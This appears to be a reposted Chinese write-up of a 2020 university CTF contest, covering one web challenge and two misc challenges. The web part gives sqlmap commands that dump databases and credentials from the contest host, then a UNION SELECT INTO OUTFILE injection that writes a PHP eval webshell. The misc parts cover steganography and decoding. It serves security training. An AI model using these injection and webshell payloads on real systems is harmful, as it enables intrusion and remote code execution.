【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

admin 2022年12月3日16:29:50评论18 views字数 2318阅读7分43秒阅读模式

[huayang]

这次比赛一道题都没出,misc1就差一点点了哎

这次有借口杂项有密码学我完全不懂啊哈哈

web题简直难得不讲武德

没有签到题没有签到题没有签到题

web1 359度防护网站

[huayang]地址:http://182.150.46.187:8802/

看这种就扫后台

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

看见有泄漏文件

/index.php.bak

一个登陆地址

/administrator.html
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

说不爆破就不爆破嘛

也确实爆不出来

泄漏文件打开看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

解码看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
GET /important_index_its_so_long_right.php?id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

给出了一个地址

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

sql注入哦

查到有5个库

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

先看看hlnt

py sqlmap.py -u http://182.150.46.187:8802/important_index_its_so_long_right.php?id=1 -D h1nt -T help -C hint --dump

有个地址

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

访问看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

提示我们登陆,我们再查查另一个库

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

name和password不就来了吗

py sqlmap.py -u http://182.150.46.187:8802/important_index_its_so_long_right.php?id=1 -D LTLT -T login -C pwd --dump
py sqlmap.py -u http://182.150.46.187:8802/important_index_its_so_long_right.php?id=1 -D LTLT -T login -C usn --dump
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

温馨提醒:别用sqlmap自带的md5解密贼垃圾

密码

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

登陆先前那个后台

登陆完成看见后台有一个地址

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

放进bp看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

又有一个地址,进去看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

又给了个地址

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

限制了长度,前面是不是漏了什么

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

进去可以看见是文件上传

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

因为是看见别人的wp写的就直接说不能上传码

我们随便传一个图片看一下地址

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

之前sq注入的时候不是还有个地址吗,现在看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

这个页面是可以注入的只不过有点难

复制一份官方wp

getshell的常规方法中,利用sql语句的into outfile并不算罕见,只是由于很多情况下secure_file_priv并未设置,导致无法进行这类文件读写,但是这在渗透中仍然不应该是被忘记的一种方法,没有尝试就不能凭经验否定这种方法。我们尝试写入一句话,但是考虑到目录可能没有可写权限,我们需要找到一个确定有可写权限的文件夹,很容易联想到上传页面暴漏的文件夹就有可写权限,于是构造语句写入一句话

union select 1,2,3,'<?php eval($_POST[1])>'into outfile '/var/www/html/upl_oad_pat_h/qwer.php'--
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

链接蚁剑即可拿到flag

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

misc1 耗子尾汁

已保存在本网站,方便以后做讲解

文件地址:https://hellohy.top/CTFfx/hzwz.gif

下载文件发现是个gif图

接下来是我个人做题方式

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

发现是gif图首先想到应该是隐写

去逐帧看看呢 没有

再用rgb通道看看 没有

再去看看十六进制,发现什么也没有

那就只剩分离咯

因为第一次写这个就详细一点

打开kali新建一个文件夹

把耗子尾汁拖进去用binwalk进行分离

binwalk -e hzwz.gif

运行成功后会生成一个新的文件夹

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

打开发现

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

猜得到这个flag是假文件

我们把视频拖进final cat pro看看

在这个位置会发现base64

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

解码看看

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

猜测可能是什么东西的密码

我们再把视频分解一下

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

可以看见有一个压缩包,可能猜测没错

输入密码打开

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

先把上面那个解密

一共经过了三次解密base64,base32,hex

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

就只打到这里 哎后面的密码学是真不知道

接下来就是单表替换

在比赛的时候他会给你个flag的格式 xxx_xxxx_xxxxxx_xx _xxxxxxxxxxxx

多出来四位,所以那四位就是flag

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

所以最后的flag为 flag{you_have_signed_in_successfully}

mis2 套娃

文件地址:https://hellohy.top/CTFfx/1.xlsx

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

看这界面就晓得文件名有问题

下载下来改成zip格式

发现可以解压

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

RC4data.txt文件 考察的就是rc4解密 还要有key值

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

swpu.xls文件打不开

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

继续改继续,发现又可以解压

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

又是改?

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

十六进制打开看看,在最后我们看见了这个

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

所以这应该是压缩包的密码了

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

成功找到key值

【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)

所以最后就是

flag {ef1a73d40977a49b99b871980f355757}

官方文档:https://wllm1013.github.io/2020/12/09/SWPUCTF2020-%E5%AE%98%E6%96%B9WP/

野生文档:http://blog.wjhwjhn.com/archives/104/

[/huayang]

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:29:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)https://cn-sec.com/archives/1443134.html

发表评论

匿名网友 填写信息